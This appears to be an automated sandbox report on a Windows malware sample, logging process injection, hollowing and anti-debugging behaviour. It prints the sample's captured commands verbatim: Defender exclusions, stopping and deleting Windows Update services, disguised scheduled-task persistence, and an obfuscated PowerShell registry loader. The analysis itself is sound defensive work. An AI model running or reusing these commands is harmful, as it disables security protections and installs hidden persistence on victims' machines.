Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe

0_2_0040AA33

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe

Code function: 0_2_00413154 mov eax, dword ptr fs:[00000030h]

0_2_00413154

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe

Code function: 0_2_0040A0C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0040A0C4

Source: C:\Users\user\AppData\Local\Google\brave.exe

Code function: 6_2_00007FF652B2F6C0 GetLastError,FormatMessageA,IsDebuggerPresent,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,LocalFree,

6_2_00007FF652B2F6C0

Source: C:\Users\user\AppData\Local\Google\brave.exe

Code function: 6_2_00007FF652B243C0 SHGetFolderPathW,GetFileSize,GetProcessHeap,HeapAlloc,RtlAllocateHeap,

6_2_00007FF652B243C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Code function: 0_2_0040A0C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040A0C4
Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Code function: 0_2_00407556 SetUnhandledExceptionFilter,	0_2_00407556
Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Code function: 0_2_0040EBEE __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0040EBEE
Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Code function: 0_2_00409594 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00409594
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 6_2_00007FF652B21190 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,malloc,memcpy,_initterm,GetStartupInfoW,exit,	6_2_00007FF652B21190
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 6_2_00007FF652DE2660 SetUnhandledExceptionFilter,	6_2_00007FF652DE2660
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002B11B3 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,_cexit,exit,	43_2_002B11B3
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002B1170 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_initterm,GetStartupInfoA,_initterm,	43_2_002B1170

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Google\brave.exe

Section loaded: C:\Users\user\AppData\Local\Temp\54A0.tmp target: C:\Windows\System32\dialer.exe protection: readonly

Jump to behavior

Encrypted powershell cmdline option found

Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @('C:\Users\Revelin', 'C:\Program Files') -Force
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: Base64 decoded Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @('C:\Users\Revelin', 'C:\Program Files') -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: Base64 decoded Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory allocated: C:\Windows\GoogleUpdate.exe base: E40000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: E40000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: unknown base: 140000000 value starts with: 4D5A

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe

Code function: 0_2_00413189 CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,

0_2_00413189

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force			Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Google\chrome.exe	Section unmapped: C:\Windows\GoogleUpdate.exe base address: E40000			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 140000000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 77D008	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Memory written: C:\Windows\System32\dialer.exe base: 526B865010	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: E40000	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: E41000	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: E51000	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 13C0000	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 13C2000	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 13CF000	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Google\brave.exe	Thread register set: target process: 712			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: unknown

Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#wajvhwink#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { schtasks /run /tn "googleupdatetaskmachineqc" } else { "c:\program files\google\chrome\updater.exe" }
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe ".(\"{1}{0}\" -f 'et','s') (\"6t\"+\"o\") ([type](\"{2}{0}{4}{1}{3}\" -f'e','mbl','refl','y','ction.asse') ) ; $dlr4s = [type](\"{3}{1}{2}{4}{0}\"-f'ry','osoft.w','in32.r','micr','egist') ; $6to::(\"{0}{1}\" -f 'l','oad').invoke( (.(\"{1}{2}{0}\" -f 't-item','g','e') (\"vari\"+\"ab\"+\"le\"+\":dlr4s\") ).\"va`lue\"::\"loc`alm`achine\".(\"{2}{1}{0}\" -f 'ey','ubk','opens').invoke((\"{1}{0}\"-f'e','softwar')).(\"{1}{0}{2}\" -f'u','getval','e').invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"ent`ryp`oint\".\"in`voke\"(${n`ull},${n`ull})"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe ".(\"{1}{0}\" -f 'et','s') (\"6t\"+\"o\") ([type](\"{2}{0}{4}{1}{3}\" -f'e','mbl','refl','y','ction.asse') ) ; $dlr4s = [type](\"{3}{1}{2}{4}{0}\"-f'ry','osoft.w','in32.r','micr','egist') ; $6to::(\"{0}{1}\" -f 'l','oad').invoke( (.(\"{1}{2}{0}\" -f 't-item','g','e') (\"vari\"+\"ab\"+\"le\"+\":dlr4s\") ).\"va`lue\"::\"loc`alm`achine\".(\"{2}{1}{0}\" -f 'ey','ubk','opens').invoke((\"{1}{0}\"-f'e','softwar')).(\"{1}{0}{2}\" -f'u','getval','e').invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"ent`ryp`oint\".\"in`voke\"(${n`ull},${n`ull})"
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#wajvhwink#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { schtasks /run /tn "googleupdatetaskmachineqc" } else { "c:\program files\google\chrome\updater.exe" }	Jump to behavior

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\brave.exe "C:\Users\user\AppData\Local\Google\brave.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\ofg.exe "C:\Users\user\AppData\Local\Google\ofg.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\chrome.exe "C:\Users\user\AppData\Local\Google\chrome.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\fl.exe "C:\Users\user\AppData\Local\Temp\fl.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown

Source: winlogon.exe, 00000044.00000000.571774188.00000254B2E10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000044.00000000.571774188.00000254B2E10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: uProgram Manager*r
Source: winlogon.exe, 00000044.00000000.571774188.00000254B2E10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: winlogon.exe, 00000044.00000000.571774188.00000254B2E10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe

Code function: GetLocaleInfoA,

0_2_0040F333

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
